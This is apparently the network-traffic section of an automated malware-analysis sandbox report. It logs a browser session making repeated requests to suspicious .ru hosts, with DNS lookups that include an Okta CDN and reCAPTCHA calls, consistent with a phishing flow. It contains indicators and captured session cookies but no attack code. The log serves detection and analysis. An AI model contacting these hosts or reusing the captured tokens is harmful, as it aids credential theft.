              Source: global trafficHTTP traffic detected: GET /mn4L6GOLUlZagYCbsT3n6wqLN3uvB4LSfOCpkdoB6H90150 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ophWiuhE9GhMo1Iuc1EtOZmJk6WgA6klGn5stqM5NxIPbKQjpaJ8Kuvc7difuAmcd233 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /uvd1XeC5IsiSnaDxxuNG8lpJEX5UxzJAf4otlN7vDS2u3CABSGw45XaOkspaLLc8o42Syl59Zef258 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /yzdQtVS4GZ6E51fEe1WiaTcO2T94coK4b5rsvJmFyXkpoAHmVSFi3h9nbLL1XtW90179 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rsTLp2CToreFE8klRPbyfp7Weuvkad8OQ49Wh538NV5jvMGQcd199 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /kl3OQPVclSq17SCChDj1jr79iwxalfvR1OKgPc5D4jl1dD56167 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijCxaVGhkfmp1IvBSHDQBCoAux104p5ScooPmnQKESTK6WeHwBmmNvbUyuaqef205 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ophWiuhE9GhMo1Iuc1EtOZmJk6WgA6klGn5stqM5NxIPbKQjpaJ8Kuvc7difuAmcd233 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /uvd1XeC5IsiSnaDxxuNG8lpJEX5UxzJAf4otlN7vDS2u3CABSGw45XaOkspaLLc8o42Syl59Zef258 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNjOHZPb3F6Nk9neEkvbnhIM3BmRVE9PSIsInZhbHVlIjoiVXRtWmszZzJLc2xSVlBCOHBIRTY5elhqaEZEcUVCM0hlY0l4VVlMZGVaT0pQOW0rYlZBOE5vWjhWTmgrMU9uTGhjZ2E5bUowZmNNSU1ySHV2N01kWWtoUzVIY3pmVWJDNGROMFpNWjBoZytyb28yOWFaeWRnOE5xUEZtY0xyREEiLCJtYWMiOiJhZGU2YjY5N2FmOWU0MjJiMGQzYmE0NDEyMDQ0OTgxNjRhZTQwMmYyMjdhMTEwNjk4NDQ2Nzk1Zjg3MjY0ZWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNCRTgrTWNNSGwwS1JqYzFwUEZrb3c9PSIsInZhbHVlIjoiNitReDJrb1RRU2NXSFNDNmRwdWMvelVYczRDSVV5MmRQQ1RuWnc2Tm4vUURHWDQvWEZsYU9tYmJQYWdLeWp5ZW5RU1dhT3V3cnRZWWhpQWVZOU9zWUxyTktmSk9RdlRmNHBKV1R2QnZCcjhzTkxzQ0dHKytkR2pLMnhrK3dEVk4iLCJtYWMiOiIzODFhOWEzNjI0YjYwZDhiMjE1OWNkNjBjYmM1YTdmMDhjZWY2MDVlMGUxNzZhYjg5YTRhYzEyYTBjYTlkYjI5IiwidGFnIjoiIn0%3D
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: essaystoolkit.com
              Source: global trafficDNS traffic detected: DNS query: ed47.eqgegucq.ru
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: s1m0b.aezeib.ru
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: github.com
              Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
              Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
              Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: beacons3.gvt2.com
              Source: unknownHTTP traffic detected: POST /recaptcha/api2/reload?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 7704sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-protobuffersec-ch-ua-mobile: ?0Accept: */*Origin: https://www.google.comX-Client-Data: CLbgygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeI&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cilAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Wed, 26 Mar 2025 05:58:04 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 05:58:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5L4RBB7WM5XxbOSAYG%2FHSK7HxE64Fmzky9DQCXaOTMII2bcBVjDebfjadbnEw6zWjvJpZfyLI8rmCdbvdakNNA2IVbrKiMM9%2BabL2MI589aIeMGT%2F7fPgl3zuIu1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=18683&min_rtt=18682&rtt_var=7007&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2228&delivery_rate=216372&cwnd=247&unsent_bytes=0&cid=7aab6dcdb303e7c7&ts=310&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 92646ac39e6c1871-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=99953&min_rtt=99692&rtt_var=21445&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1895&delivery_rate=37033&cwnd=240&unsent_bytes=0&cid=b9d8587f5b1eea3b&ts=2264&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 05:58:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYtCedMJZ7UUqeTb3SyDyASvCuKBh4ryQ6kT1%2FrPc9SqbZ29INmdcaLnXaE1kgjfka5JiSZLtDbQ5fUKYbJByR%2F8UqEMLqgfPJwCvUROjG%2F1mzA6pTXaNeglfxC%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=16452&min_rtt=16444&rtt_var=6184&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2041&delivery_rate=244883&cwnd=252&unsent_bytes=0&cid=2c8be9335a5bbbaa&ts=183&x=0"Server: cloudflareCF-RAY: 92646af489ea5612-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=97995&min_rtt=97855&rtt_var=20859&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1708&delivery_rate=37897&cwnd=247&unsent_bytes=0&cid=31b1479a91e363ea&ts=492&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 05:58:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pBC7vFp8Q8Pp9CyxYSSpnlZb1AML8Uqmz68iUBltcly%2BGKuWmWLa7SMOk44WYs2t4GUz91V8kfLCJc8pwtPu8rygPwbSsmajMPxO1VHZZoLL%2FbBUs5s1RlS0eupC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=357&min_rtt=338&rtt_var=165&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2055&delivery_rate=8186234&cwnd=252&unsent_bytes=0&cid=5f867b600f53294f&ts=166&x=0"Server: cloudflareCF-RAY: 92646aff2a0d624e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=98128&min_rtt=97070&rtt_var=21546&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1721&delivery_rate=38356&cwnd=245&unsent_bytes=0&cid=940afa2d3137027d&ts=440&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 05:58:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EfskkQL1SJw7U4qOnheOJKtOZgyWqGqQFVEOA0a%2B3YGDth5sFro4zCbVb%2BttPJaXR%2Bv%2F02BaQIXwpVk%2BuZdR5kYUPAZwWrl%2BQbBxbIyuFQoTzYuhEDNklgIemvKE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=18398&min_rtt=18301&rtt_var=6932&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2061&delivery_rate=220971&cwnd=247&unsent_bytes=0&cid=da25ae49cc7ca597&ts=191&x=0"Server: cloudflareCF-RAY: 92646b17cf8d32d9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=96649&min_rtt=96592&rtt_var=20471&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1727&delivery_rate=38467&cwnd=233&unsent_bytes=0&cid=2edc689a6aefd5c3&ts=937&x=0"
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
